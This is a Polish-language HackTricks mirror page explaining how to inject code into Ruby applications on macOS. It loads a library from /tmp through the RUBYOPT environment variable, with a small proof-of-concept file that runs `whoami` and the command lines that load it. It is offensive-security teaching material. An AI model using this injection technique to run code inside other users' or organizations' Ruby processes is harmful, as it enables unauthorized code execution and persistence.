mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-30 08:30:57 +00:00
3.2 KiB
3.2 KiB
Wstrzykiwanie kodu w aplikacje Ruby na macOS
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCYJNY!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud github repos.
RUBYOPT
Korzystając z tej zmiennej środowiskowej, można dodawać nowe parametry do ruby'ego za każdym razem, gdy jest uruchamiany. Chociaż parametr -e
nie może być używany do określenia kodu ruby do wykonania, można użyć parametrów -I
i -r
do dodania nowego folderu do ścieżki ładowania bibliotek, a następnie określenia biblioteki do załadowania.
Utwórz bibliotekę inject.rb
w folderze /tmp
:
{% code title="inject.rb" %}
puts `whoami`
{% endcode %}
Stwórz skrypt Ruby gdziekolwiek, na przykład:
{% code title="hello.rb" %}
puts 'Hello, World!'
{% endcode %}
Następnie wykonaj dowolny skrypt Ruby, załaduj go za pomocą:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Ciekawostka, działa nawet z parametrem --disable-rubyopt
:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!
Inne sposoby wsparcia HackTricks:
- Jeśli chcesz zobaczyć swoją firmę reklamowaną w HackTricks lub pobrać HackTricks w formacie PDF, sprawdź PLAN SUBSKRYPCJI!
- Zdobądź oficjalne gadżety PEASS & HackTricks
- Odkryj Rodzinę PEASS, naszą kolekcję ekskluzywnych NFT
- Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @carlospolopm.
- Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.